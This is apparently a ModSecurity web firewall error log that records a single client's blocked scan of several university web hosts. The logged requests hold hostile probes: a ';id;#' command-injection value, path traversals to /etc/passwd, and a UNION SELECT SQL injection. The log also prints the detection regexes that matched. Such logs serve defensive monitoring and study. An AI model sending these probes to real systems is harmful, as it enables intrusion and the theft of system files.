[Tue Aug 29 11:46:19.529381 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAdxUtMAAAAC"]
[Tue Aug 29 11:46:19.535737 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhrqRcAAAAo"]
[Tue Aug 29 11:46:19.547486 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhgoOIAAAAb"]
[Tue Aug 29 11:46:19.549678 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAib52gAAAAA"]
[Tue Aug 29 11:46:19.555537 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAi5uFQAAAAS"]
[Tue Aug 29 11:46:20.356814 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAib52kAAAAA"]
[Tue Aug 29 11:46:20.389422 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAib52oAAAAA"]
[Tue Aug 29 11:46:20.453893 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14HMCo-f0AAAi2yDkAAAAN"]
[Tue Aug 29 11:46:20.513438 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhBSHQAAAAX"]
[Tue Aug 29 11:46:20.544773 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhl0CMAAAAi"]
[Tue Aug 29 11:46:20.545732 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAdxUtYAAAAC"]
[Tue Aug 29 11:46:20.558919 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAhZRm0AAAAG"]
[Tue Aug 29 11:46:20.606600 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAhl0CUAAAAi"]
[Tue Aug 29 11:46:20.624841 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAi2yD0AAAAN"]
[Tue Aug 29 11:46:21.362431 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HcCo-f0AAAi5uFoAAAAS"]
[Tue Aug 29 11:46:21.437544 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HcCo-f0AAAi0JLIAAAAK"]
[Tue Aug 29 11:46:22.463958 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhui18AAAAr"]
[Tue Aug 29 11:46:22.494975 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAib53QAAAAA"]
[Tue Aug 29 11:46:22.497432 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhrqRwAAAAo"]
[Tue Aug 29 11:46:22.533609 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAi0JLcAAAAK"]
[Tue Aug 29 11:46:22.573137 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAdxUuMAAAAC"]
[Tue Aug 29 11:46:23.487169 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14H8Co-f0AAAi0JL4AAAAK"]
[Tue Aug 29 11:46:27.380102 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhBSIcAAAAX"]
[Tue Aug 29 11:46:27.443821 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBsAAAAH"]
[Tue Aug 29 11:46:27.446599 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhZRpAAAAAG"]
[Tue Aug 29 11:46:27.466542 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBwAAAAH"]
[Tue Aug 29 11:46:27.510120 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14I8Co-f0AAAhZRpMAAAAG"]
[Tue Aug 29 11:46:27.623184 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhZRpgAAAAG"]
[Tue Aug 29 11:46:28.368364 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAi-RB8AAAAH"]
[Tue Aug 29 11:46:28.406950 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAdxUvMAAAAC"]
